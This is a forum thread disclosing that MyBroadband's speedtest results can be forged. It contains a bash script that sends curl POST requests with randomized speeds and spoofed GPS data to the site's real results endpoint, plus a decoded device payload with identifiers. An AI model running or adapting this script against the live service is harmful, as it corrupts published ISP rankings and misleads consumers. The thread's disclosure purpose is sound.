Deconstructing MyBroadband's Speedtest system

Last edited:
Some of the most interesting nerd stuff regarding mybb and they completely ignore this thread.
Meh.

More reps to Waylander.
 
Waylander said:
Anyone have a contact at Vodacom PR I can speak to?
Click to expand...
I see they're advertising on Highveld in the morning that according to MyBroadband MTN has the fastest network.

Maybe you should phone in one morning, refer them to this thread and the MTN prediction.

...or maybe just ask MTN about it on Twitter/Facebook. I'm sure the masses will "demand" answers.
 
Hamster said:
I see they're advertising on Highveld in the morning that according to MyBroadband MTN has the fastest network.

Maybe you should phone in one morning, refer them to this thread and the MTN prediction.

...or maybe just ask MTN about it on Twitter/Facebook. I'm sure the masses will "demand" answers.
Click to expand...
On Jacaranda, it's the fastest android based network. Wtf...MTN run android servers , and routers?
 
Oh damn, I noticed this too
Since 2017 and nothing done about it
 
Mr Scratch said:
Hey there,

I was going to write a better post, but I'm busy so I decided to just post what I had written so far.

MyBroadband's current system of measuring speedtests, which are then used as analytics data for their various partners can easily be spoofed.

(1)
MyBroadband's system uses a simple HTTP request to post the data from the client device to their analytics server.

(1.1)

The desktop platform, found here: http://speedtest.mybroadband.co.za uses the following:



This will query the current speedtest ID, which can be popped into to view the current and all previous tests.



The above is where things gets tasty (I chose to remove some information). I can simply edit the above data, and POST it, creating a valid result, which will then be used as part of the next "Top ISP blah blah" article. The same can be done for MyBroadband's mobile apps on iOS and Android - both on WiFi and cellular. Continue reading.

(1.2)

On the mobile apps, I can spoof both connection information, and geographic information.

Code: 
#!/bin/bash
###############
#Generate spoofed GPS data from: http://www.geomidpoint.com/random/ in tab separated format and paste into geo_raw.txt
#awk '{print $2 " " $4}' geo_raw.txt > geo_data.txt
#Now geo_data.txt has $latitude $longitude formatted data
################

spoofedAccuracy="3"
spoofedDevice="iPhone X (GSM)"

while read -r geoData
    do
        clear
        spoofedLatitude=$(echo $geoData | awk '{print $1}')
        spoofedLongitude=$(echo $geoData | awk '{print $2}')
        spoofedHash=$(date +%s | md5sum | awk '{print $1}')
        spoofedDownload=$(( ( RANDOM % 50000 )  + 1 ))
        spoofedUpload=$(( ( RANDOM % 50000 )  + 1 ))
        spoofedLatency=$(( ( RANDOM % 20 )  + 1 ))
        curl -i -s -k  -X $'POST' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: okhttp/3.6.0' --data-binary $'action=result&ccode=za&longitude='$spoofedLongitude'&latitude=-'$spoofedLongitude'&accuracy=3&coordinates_mode=1&latency='$spoofedLatency'&download='$spoofedDownload'&upload='$spoofedUpload'&data_download=1654716&data_upload=34850&legacy=0&threads=10&misc=[B]%7B%221%22%3A%22357665058790519%22%2C%222%22%3A%22655020004420395%22%2C%223%22%3A%228ta%22%2C%224%22%3A%2265502%22%2C%225%22%3A%22za%22%2C%226%22%3A%22TelkomSA%22%2C%227%22%3A%2265502%22%2C%228%22%3A%22za%22%2C%2221%22%3A-127%2C%2222%22%3A%22Rockchip%22%2C%2223%22%3A%22H81930I%22%2C%229%22%3A56021515%2C%2210%22%3A2143813%2C%2211%22%3A19441912%2C%2212%22%3A441728%2C%2213%22%3A36579603%2C%2214%22%3A1702085%2C%2215%22%3A101%2C%2216%22%3A79732%2C%2245%22%3A309%2C%2226%22%3A-91%2C%2227%22%3A11%2C%2225%22%3A15%2C%2228%22%3A0%2C%2229%22%3A0%2C%2230%22%3A0%2C%2231%22%3A0%2C%2232%22%3A392568%2C%2233%22%3A118360%2C%2234%22%3A62328266%2C%2235%22%3A3023165%2C%2224%22%3A%22102.249.53.117%22%2C%2238%22%3A%225.1.1%22%2C%2239%22%3A%220%22%2C%2240%22%3A-1%2C%2241%22%3A-1%2C%2242%22%3A2%2C%2243%22%3A14%2C%2244%22%3A21%2C%2248%22%3A%221.4.1.0%22%2C%2249%22%3A%221%22%2C%2250%22%3A%22Auto%20select%20server%22%2C%2251%22%3A15%2C%2253%22%3A14%2C%2236%22%3A400%2C%2237%22%3A10118325246%7D&hash=7ebcfc2f827f36d83585e377011df1d5' [/B]$'http://speedtest.mybroadband.co.za/apps/gateway.php'
        echo $spoofedDownload
        echo $spoofedUpload   
        echo $spoofedLatency
    done < geo.txt
done;


The encoded part in bold can be decoded to:
Code: 
{"1":"357665058790519","2":"655020004420395","3":"8ta","4":"65502","5":"za","6":"TelkomSA","7":"65502","8":"za","21":-127,"22":"Rockchip","23":"H81930I","9":56021515,"10":2143813,"11":19441912,"12":441728,"13":36579603,"14":1702085,"15":101,"16":79732,"45":309,"26":-91,"27":11,"25":15,"28":0,"29":0,"30":0,"31":0,"32":392568,"33":118360,"34":62328266,"35":3023165,"24":"102.249.53.117","38":"5.1.1","39":"0","40":-1,"41":-1,"42":2,"43":14,"44":21,"48":"1.4.1.0","49":"1","50":"Auto select server","51":15,"53":14,"36":400,"37":10118325246}

From the above, run on an Android test device, we can see that they collect information about the device's SIM network, current network, device name and hardware, OS version, app version, server used, and location information. Which can all be spoofed.

(2)
MyBroadband publishes their analytics data, sourced from the speedtest system, on their news site. This can potentially be abused by network operators or ISPs to improve their own image, or damage the image of their competitors.
Click to expand...
do i get a prize now?
 
So since this has been resurrected, is this still an issue?
Can we be kingmakers in the next round?
 
You must log in or register to reply here.
Back
Top
Sign up to the MyBroadband newsletter
X